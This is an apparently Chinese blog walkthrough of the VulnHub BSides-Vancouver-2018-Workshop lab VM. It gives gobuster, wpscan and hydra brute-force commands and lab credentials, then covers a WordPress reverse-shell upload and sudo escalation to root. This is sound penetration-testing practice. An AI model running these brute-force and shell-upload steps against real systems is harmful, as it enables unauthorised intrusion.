小白的靶机BSides-Vancouver-2018-Workshop

靶机地址:https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/

开机界面就是这样

在这里插入图片描述
在这里插入图片描述

确定靶机的IP地址:192.168.72.131

在这里插入图片描述
靶机开放了21、22、80端口

访问页面呗

在这里插入图片描述
源码 F12 找了一波 没撒子东西

直接上gobuster 扫描一下

命令:gobuster dir -u http://192.168.72.131 -w /usr/share/dirb/wordlists/common.txt

这个命令的参数在之前的文章总结过 就不在赘述了

看到了/robots.txt 文件

这个在刚开始nmap扫描也有看到

在这里插入图片描述

看到一个目录 继续访问一下

在这里插入图片描述

是个wordpress 这个 在nmap扫描也有看到

上wpscan扫描一下呗

命令:wpscan --url http://192.168.72.131/backup_wordpress/ --enumerate 

发现了两个用户

在这里插入图片描述
破解一下密码

命令:wpscan --url http://192.168.72.131/backup_wordpress/ -U john -P /usr/share/wordlists/rockyou.txt

在这里插入图片描述

账号:john
密码:enigma

wordpress固有的框架 登录界面/wp-admin

发现上传点

在这里插入图片描述

找kali自带的 反向shell

在这里插入图片描述

修改IP为kali本身的IP

在这里插入图片描述进行上传

在这里插入图片描述找到 自己上传的文件

在这里插入图片描述
拿到路径
在这里插入图片描述
开启监听

在这里插入图片描述

访问一下

拿到低权限的shell

在这里插入图片描述找寻一下 信息

查看当前的用户

在这里插入图片描述
查看当前的用户组

cat /etc/group 

在这里插入图片描述

在这里插入图片描述

发现了anne用户直接在sudo用户组

上九头蛇 破解一下用户anne的密码

命令:hydra -l anne -P /usr/share/wordlists/rockyou.txt -t 4 192.168.72.131 ssh

在这里插入图片描述

账号:anne   
密码:princess

进行ssh 登录 发现sudo提权 是ALL!!!

直接:sudo su 直接提权

在这里插入图片描述
找到flag

ok 这台靶机就到这里

猜你喜欢

转载自blog.csdn.net/wo41ge/article/details/113621055